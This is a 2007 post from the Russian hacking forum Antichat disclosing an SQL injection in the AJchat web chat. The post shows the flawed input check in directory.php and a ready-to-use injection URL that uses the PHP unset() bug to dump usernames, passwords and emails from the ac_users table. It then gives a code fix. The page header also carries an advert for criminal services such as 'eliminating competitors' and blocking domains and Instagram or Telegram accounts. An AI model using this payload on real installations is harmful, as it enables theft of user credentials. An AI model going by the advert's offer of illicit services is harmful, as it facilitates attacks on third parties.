Форум АНТИЧАТ - AJchat Remote Sql Injection using unset() bug

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
AJchat Remote Sql Injection using unset() bug

Опции темы

Поиск в этой теме

Опции просмотра

AJchat Remote Sql Injection using unset() bug

06.04.2007, 18:07

~~gemaglabin~~

Banned

Регистрация: 01.08.2006

Сообщений: 725

Провел на форуме:
7681825

Репутация: 4451

AJchat Remote Sql Injection using unset() bug

В связи с отсуствием нормального применения баги , а именно в таблице хранятся только юзеры , выкладываю в паблик

Файл directory.php , самое начало кода

PHP код:


		
			
if (isset($_GET["s"])){
    $_GET["s"] = strtoupper($_GET["s"]);
    if (strlen($_GET["s"])==1 && $_GET["s"]>='A' && $_GET["s"]<='Z'){
        // nothing
    }else unset($_GET['s']);

}

По задумке програмистов - если введенные данные не в пределах от a..z то unset() переменной - вычисляем ключи для php4 и для php5 и эксплуатируем

Код:

directory.php?s='and1=2union select concat_ws(char(59),id,username,password,email),null+from+ac_users/*&5861526=1&5863704=1

Вендор : http://ajchat.sourceforge.net/

Решение

PHP код:


		
			
if (isset($_GET["s"])){
    $_GET["s"] = strtoupper($_GET["s"]);
    if (strlen($_GET["s"])==1 && $_GET["s"]>='A' && $_GET["s"]<='Z'){
        // nothing
    }else 
{
$_GET['s'] = NULL;
unset($_GET['s']);
}

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
SQL Injection FAQ	bx_N	Forum for discussion of ANTICHAT	2	08.03.2007 18:48
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
SQL Injection для чайников, взлом ASP+MSSQL	k00p3r	Чужие Статьи	0	12.06.2005 12:42
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход